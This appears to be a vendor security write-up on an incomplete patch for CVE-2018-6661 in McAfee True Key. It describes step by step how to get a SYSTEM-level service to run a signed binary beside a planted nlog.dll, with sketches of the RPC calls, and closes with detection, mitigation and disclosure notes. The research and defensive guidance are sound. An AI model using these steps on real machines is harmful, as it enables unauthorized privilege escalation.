There are many reasons why a vendor-supplied patch may fail to improve the security of the software. In some instances, a patch may actually increase the attack surface and consequently introduce new vulnerabilities. In other instances, a patch may be incomplete, leaving avenues by which it can be bypassed and the vulnerable code triggered. Incomplete patches are often the result of a vendor specifically patching the PoC received in a disclosure without addressing the root cause. In the case of CVE-2018-6661, we discovered an incomplete patch that left multiple ways for attackers to bypass it.
Summary
A publicly disclosed vulnerability for the Intel Security (McAfee) True Key software remains exploitable despite multiple vendor-supplied patches. Any logged in user, including the Guest account, can send a series of crafted requests to the True Key service to execute arbitrary code via a DLL-side loading attack vector. As a result, unprivileged users can escalate privileges to NT AUTHORITY\SYSTEM on any Windows machine with True Key installed.
Background
True Key is a password manager supporting several methods of sign-in, including face and fingerprint, email, master password, or a trusted device. It is freely available for Windows, Mac OS X, Android and iOS devices but requires a subscription to store more than 15 passwords. Until recently, True Key was bundled with Adobe Flash and required users to opt out during installation.
When True Key is installed on Windows, it includes an always-running service with SYSTEM privileges that listens on TCP port 30000 on the loopback interface 127.0.0.1. The service coordinates functionality across the various components of the True Key software by providing RPC mechanisms. For this vulnerability, we are interested specifically in the SecureExecute RPC method, which launches executables trusted by McAfee, where trust is verified by digital signature.
Patch
By examining the vendor's patch, we can see that it only addresses the problem within McAfee.TrueKey.Sync.exe, and only for one of its DLL dependencies, namely the McAfee.TrueKey.SDKLibAdapter import. When the program is run, the .NET runtime dynamically loads the DLL dependencies required by the program. We can identify the direct dependencies from the imports at the top. Since Windows searches for DLLs in a specific order, outlined in Microsoft's documentation, it is possible to place a modified DLL in the same folder so that it will be loaded instead. It should be noted that system imports are contained in the known DLLs list and cannot be hijacked in this way by an attacker.
The patch enforces that the SDKLibAdapter library must be loaded from the C:\Program Files\TrueKey folder (C:\Program Files\McAfee\TrueKey in more recent versions), which cannot be written to by an unprivileged user. However, the binary also imports the NLog logging library and does not enforce a path constraint for the corresponding DLL. The patch is incomplete because it overlooks this import, so nlog.dll can be utilized for arbitrary code execution just as McAfee.TrueKey.SDKLibAdapter.dll could be in versions prior to the patch. Furthermore, any other McAfee-signed binary can be used to exploit the vulnerability as long as it depends on a DLL outside the known DLLs list. There are multiple ways to go about finding DLL dependencies.
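The gap in the patch can be modeled with a short sketch. This is not McAfee's code; it is an illustrative model (all paths and the pinned-import set are assumptions based on the behavior described above) of a loader where only one import is pinned to the install folder while every other import still resolves from the application directory first.

```python
# Illustrative model of the incomplete patch: one dependency is pinned to the
# trusted install folder, but other imports resolve from the EXE's directory.

TRUSTED_DIR = r"C:\Program Files\McAfee\TrueKey"
# Hypothetical: per the patch, only this import is path-checked.
PINNED_IMPORTS = {"mcafee.truekey.sdklibadapter.dll"}

def resolve_dll_dir(dll_name: str, app_dir: str) -> str:
    """Return the directory a DLL would be loaded from under the patch."""
    if dll_name.lower() in PINNED_IMPORTS:
        return TRUSTED_DIR  # the patch forces the install folder
    return app_dir          # everything else: application directory wins
```

Because nlog.dll is not pinned, a copy planted next to a relocated (still validly signed) McAfee.TrueKey.Sync.exe is the one that gets loaded.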
Reversing True Key
Upon inspection of the decompiled TrueKey service binary, it is clear that it is an Apache Thrift based service.
Thrift is a software library and set of code-generation tools developed at Facebook to expedite development and implementation of efficient and scalable backend services. Its primary goal is to enable efficient and reliable communication across programming languages by abstracting the portions of each language that tend to require the most customization into a common library that is implemented in each language. Specifically, Thrift allows developers to define datatypes and service interfaces in a single language-neutral file and generate all the necessary code to build RPC clients and servers.
Examining the code auto-generated by Thrift for the SecureExecute command, we can gather the data types expected for such a request to the service. From this code, we can create our own thrift file for the subset of the RPC service that is necessary for exploitation.
The SecureExecute method takes two parameters: a 32-bit integer clientId and a string specifying the path to an executable file to run. Before executing an RPC request, the service verifies that the clientId matches a known value that it has issued previously.
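A thrift file covering just this subset might look like the following. Only the parameters named in the text are grounded; the service name, field ids, and the exact shape of the YAPClient struct are reconstructions for illustration.

```thrift
// Hypothetical reconstruction of the relevant subset of the True Key
// RPC interface; names and field ids beyond the text are illustrative.
struct YAPClient {
  1: optional i32 port   // port the "trusted" client claims to listen on
}

service YAPService {
  i32 RegisterClient(1: YAPClient client)                        // returns a clientId
  void SecureExecute(1: i32 clientId, 2: string executablePath)  // runs a McAfee-signed EXE
}
```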
The handler for the SecureExecute API request will create a SecureExecuteCommand object, wrap it in a CheckedCommand object and pass it to the runner.Sync() method which will call the CheckedCommand object’s Execute() method. CheckedCommand verifies that the clientId supplied in the request matches an existing ClientId that the service has already issued. If so, then it calls the Execute() method of the wrapped object which in this instance is a SecureExecuteCommand object.
SecureExecuteCommand.Execute() will inspect the requested executable to ensure that the file has been digitally signed by McAfee before spawning a child process running the executable.
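The dispatch chain described in the last two paragraphs can be sketched as follows. Class and method names follow the decompiled code; the bodies are simplified Python stand-ins (the real service verifies Authenticode signatures and spawns a process), not the actual implementation.

```python
# Sketch of the True Key service dispatch chain: CheckedCommand wraps
# SecureExecuteCommand and gates it on a previously issued clientId.

class SecureExecuteCommand:
    def __init__(self, path, is_signed_by_mcafee, launch):
        self.path = path
        self.is_signed_by_mcafee = is_signed_by_mcafee  # stand-in for signature check
        self.launch = launch                            # stand-in for process creation

    def Execute(self):
        if not self.is_signed_by_mcafee(self.path):
            raise PermissionError("executable not signed by McAfee")
        return self.launch(self.path)

class CheckedCommand:
    def __init__(self, client_id, issued_ids, inner):
        self.client_id = client_id
        self.issued_ids = issued_ids  # clientIds previously issued by the service
        self.inner = inner

    def Execute(self):
        if self.client_id not in self.issued_ids:
            raise PermissionError("unknown clientId")
        return self.inner.Execute()

def sync(command):
    """Stand-in for runner.Sync(): simply invokes the command's Execute()."""
    return command.Execute()
```

Note that both checks are purely local preconditions; neither considers where the signed executable is located, which is what the DLL planting abuses.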
So in order to get the service to actually execute a binary, we must provide it with a valid clientId and the binary must be signed by McAfee. ClientIds are issued via the RegisterClient method whose sole parameter consists of a YAPClient struct that can contain any number of optional fields. On registration, the service verifies that the client is a trusted client by checking the port field from the YAPClient struct. The port field is used to find the corresponding PID listening on that port and then the service checks that the executable associated with that PID has been digitally signed by McAfee.
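The flaw in this trust check is that the port is attacker-controlled, and the service itself listens on port 30000. A minimal model (helper functions are hypothetical stand-ins for the netstat-style lookup and signature verification the service performs):

```python
# Model of the flawed RegisterClient trust check: the claimed port is mapped
# to a PID, and the PID's executable is checked for a McAfee signature.

SERVICE_PORT = 30000  # the True Key service's own listening port

def pid_listening_on(port, port_table):
    return port_table.get(port)          # stand-in for a port-to-PID lookup

def is_mcafee_signed(pid, signed_pids):
    return pid in signed_pids            # stand-in for signature verification

def register_client(claimed_port, port_table, signed_pids, next_id=1234):
    """Issue a clientId if the claimed port belongs to a McAfee-signed process."""
    pid = pid_listening_on(claimed_port, port_table)
    if pid is not None and is_mcafee_signed(pid, signed_pids):
        return next_id                   # a fresh clientId is issued
    return None                          # registration refused
```

An attacker who simply claims port 30000 makes the service look up its own PID, find its own (McAfee-signed) binary, and vouch for itself.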
Exploitation
In order to exploit the vulnerability, we will need to send a SecureExecute request to the True Key service requesting that it execute McAfee.TrueKey.Sync.exe from a folder that contains a modified nlog.dll. There are multiple utilities available, such as dnSpy, for directly modifying a compiled .NET executable or DLL. Since McAfee.TrueKey.Sync.exe calls the GetCurrentClassLogger() method, we modified this method to launch a child process that executes a file containing our payload within the same folder.
The exploit will function as intended even though our modifications do not adhere to the method’s type signature. The return value of Process.Start() is not a Logger object and any further use of the value returned from this method will likely throw an error, but once this code has executed we can utilize the child process running our payload to gain escalated privileges.
Initially, we send a RegisterClient request to the True Key service to get a valid clientId. Since we know that the service itself listens on port 30000, our RegisterClient request specifies that value for the port field in the YAPClient struct. In effect, the service verifies that it trusts itself as a valid client and responds with a new clientId.
With a valid clientId in hand, we send a SecureExecute request with that clientId and an executablePath pointing to our copy of McAfee.TrueKey.Sync.exe within a folder containing our modified nlog.dll. The .NET runtime loads our modified nlog.dll, and when the GetCurrentClassLogger() method is called, our pop.exe payload is executed.
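The two-step flow above can be summarized in a short sketch. The `rpc` client stub here is hypothetical; a real exploit speaks the Thrift binary protocol to 127.0.0.1:30000, as our Metasploit module does.

```python
# End-to-end flow of the attack as described (client stub is hypothetical).

def exploit(rpc, staged_exe_path):
    """rpc: object exposing RegisterClient/SecureExecute like the service."""
    # Step 1: claim to be the service itself so the port-based trust
    # check passes and a clientId is issued.
    client_id = rpc.RegisterClient({"port": 30000})
    # Step 2: ask the service to run the relocated, still-signed McAfee
    # binary; the .NET loader then picks up the planted nlog.dll beside it.
    rpc.SecureExecute(client_id, staged_exe_path)
    return client_id
```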
We’ve written the exploit as a metasploit module and here is a demonstration:
Detection
Active exploitation can be detected by inspecting loopback traffic to port 30000 for SecureExecute requests where the executablePath parameter does not start with the C:\Program Files\McAfee\TrueKey prefix.
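The path check itself is simple once the executablePath string has been parsed out of the request; a sketch (the parsing of the Thrift frame is elided, and the case-insensitive, normalized comparison is our own hardening choice):

```python
# Sketch of the detection heuristic: flag SecureExecute requests whose
# target executable lies outside the write-protected install directory.
import ntpath

TRUSTED_PREFIX = r"C:\Program Files\McAfee\TrueKey"

def is_suspicious_secure_execute(executable_path: str) -> bool:
    """Return True if the requested executable is outside the install dir."""
    # Normalize Windows path separators and compare case-insensitively,
    # since NTFS paths are case-insensitive.
    normalized = ntpath.normpath(executable_path).lower()
    return not normalized.startswith(TRUSTED_PREFIX.lower())
```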
Mitigation
Microsoft has an informative article on the topic of Dynamic-Link Library Security with recommendations for how developers can safeguard their applications against this kind of attack. At the application level, the SecureExecute method should reject any requests where the executablePath does not begin with a prefix to a known write-protected folder such as C:\Program Files\McAfee\TrueKey. Additionally, the RegisterClient method should treat the port specified in the request as untrusted user input and verify the client in a more secure manner. If your organization does not rely on True Key then uninstalling this software will remove the vulnerable service.
About Exodus Intelligence N-Day Subscription Offering
In addition to internally discovered zero-day vulnerabilities, Exodus Intelligence also offers a feed comprised of threats that have been publicly disclosed by outside organizations or the vendors themselves. Subscribers of our n-day offering gain access to a collection of vetted, reliable exploits and corresponding documentation enabling them to ensure their defensive measures have been implemented properly. This is critically important in cases where the vendor-supplied patch fails to address the root cause, since the existence of a patch may falsely assure users they are no longer at risk.
Disclosure
We disclosed the failed patch to McAfee and they published an update in response. However, we tested the latest version available (5.1.173.1 as of September 7th, 2018) and found that it remains vulnerable, requiring no changes to our exploit.